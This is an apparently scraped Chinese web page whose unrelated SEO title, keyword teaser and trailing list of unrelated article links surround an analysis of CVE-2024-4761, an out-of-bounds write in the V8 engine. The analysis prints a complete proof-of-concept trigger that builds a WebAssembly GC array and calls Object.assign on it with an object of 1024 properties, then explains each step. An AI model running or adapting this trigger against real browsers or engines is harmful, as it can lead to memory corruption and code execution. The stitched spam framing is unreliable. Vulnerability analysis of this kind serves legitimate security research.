当前位置: 首页 > news >正文

中标公示查询网站wordpress 淘宝客采集

中标公示查询网站,wordpress 淘宝客采集,利用网站宣传腐倡廉建设工作报道,适合小企业的erp软件分析 CVE-2024-4761 和 POC 代码 CVE-2024-4761 描述 CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞,报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏,进而导致程序崩溃或其他不安全行为。 POC 代码解…

分析 CVE-2024-4761 和 POC 代码

CVE-2024-4761 描述

CVE-2024-4761 是一个在 V8 引擎中发现的越界写漏洞,报告日期为 2024-05-09。这个漏洞可能允许攻击者通过特制的代码执行任意代码或者造成内存破坏,进而导致程序崩溃或其他不安全行为。

POC 代码解析
const prefix = "...";d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);let builder = new WasmModuleBuilder();let array = builder.addArray(kWasmI32, true);builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();let instance = builder.instantiate({});
let wasm = instance.exports;let array42 = wasm.createArray(42);let src = {};
src.a = 1;
delete src.a;for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
}Object.assign(array42, src);

在这里插入图片描述

代码分析
  1. 加载 wasm-module-builder.js 模块

    d8.file.execute(`${prefix}/test/mjsunit/wasm/wasm-module-builder.js`);
    

    这里假设 D8(V8 引擎的调试工具)正在执行一段 JavaScript 代码,该代码加载了 WebAssembly 模块构建器脚本。

  2. 构建 WebAssembly 模块

    let builder = new WasmModuleBuilder();
    let array = builder.addArray(kWasmI32, true);
    

    使用 WasmModuleBuilder 创建一个新的 WebAssembly 模块,并定义一个整数数组类型。

  3. 添加和导出一个函数

    builder.addFunction('createArray', makeSig([kWasmI32], [kWasmExternRef])).addBody([kExprLocalGet, 0,kGCPrefix, kExprArrayNewDefault, array,kGCPrefix, kExprExternConvertAny,]).exportFunc();
    

    这个函数 createArray 接受一个整数参数,创建一个新的 WebAssembly 数组并返回一个外部引用。函数体包含指令序列来获取局部变量,创建默认的数组,并将其转换为外部引用。

  4. 实例化模块并调用导出函数

    let instance = builder.instantiate({});
    let wasm = instance.exports;
    let array42 = wasm.createArray(42);
    

    实例化模块后,调用 createArray 函数,创建一个包含 42 个元素的数组。

  5. 构建和修改对象

    let src = {};
    src.a = 1;
    delete src.a;
    for (let i = 0; i < 1024; i++) {src[`p${i}`] = 1;
    }
    Object.assign(array42, src);
    

    创建一个对象 src,并在其中动态添加属性。最后,使用 Object.assignsrc 的属性赋值给 array42

漏洞利用可能性

此代码通过 Object.assign 将一个具有大量属性的对象赋值给一个 WebAssembly 数组,这种操作在 V8 引擎内部可能导致内存管理或边界检查失效,进而触发越界写漏洞。具体表现可能包括覆盖数组边界以外的内存区域,从而执行任意代码或导致程序崩溃。

结论

从代码来看,这段 POC 似乎旨在触发 V8 引擎中的越界写漏洞。通过构建一个包含大量属性的对象并将其分配给 WebAssembly 数组,可以测试 V8 的内存边界检查是否有缺陷。如果存在缺陷,该操作可能会导致越界写,从而验证 CVE-2024-4761 漏洞的真实性。因此,POC 代码看起来是合理且可能真实的漏洞利用示例。

http://www.yayakq.cn/news/28219/

相关文章:

  • 建材团购网站建设方案合肥网站建设公司 千鸟
  • 上海医疗器械网站前置审批网站logo源码
  • 我的网站不做推广 百度能搜索到我网站吗wordpress太慢了
  • asp.net mvc 企业网站文件服务器怎么搭建
  • 网站qq未启用阿克苏网站建设优化
  • 梧州市建设局网站有创意的个人网站名字
  • 自助建站软件企业网站建设规范
  • 开封市建设中专网站国内做网站比较好的公司有哪些
  • 久其软件公司网站西凤酒网站建设的基本情况
  • 做外贸是不是必须有网站哪个网站专门做高清壁纸
  • 鲜花网站建设方案朝阳seo建站
  • 网站建设前台功能千锋培训学费多少钱
  • 四川住房和城乡建设九大员网站wordpress 网站收录
  • 做门面商铺比较好的网站php网站开发技术环境要求
  • 微网站模板前后台苏州互联网公司在哪个区
  • 外贸商城网站开发书360网站推广官网授权商
  • 扁平化网站设计百度网盘网页版登录首页
  • 惠州网站制作公司怎样上传wordpress模板
  • 百度下拉框推广网站嘉兴网站建设搭建
  • 网站建设 信科网络建筑信息网
  • 安徽道遂建设工程有限公司网站网上商店网站设计
  • 深圳网站建设哪家比较好灰色词seo
  • 太原网站建设王道下拉惠怎么自己制作游戏
  • 自己建设网站流程买布自己做网站衣服的
  • 做网站怎么购买主机毕业设计代做网站
  • 020网站模板wordpress开发者文档下载
  • 做网站什么主题好wordpress模板专题页
  • 县市区没有建设信用网站和平台建设网站空间怎么预算
  • 网站建设的组织保障公司起名字大全免费4个字
  • 精美网站源码下载公众号 微网站开发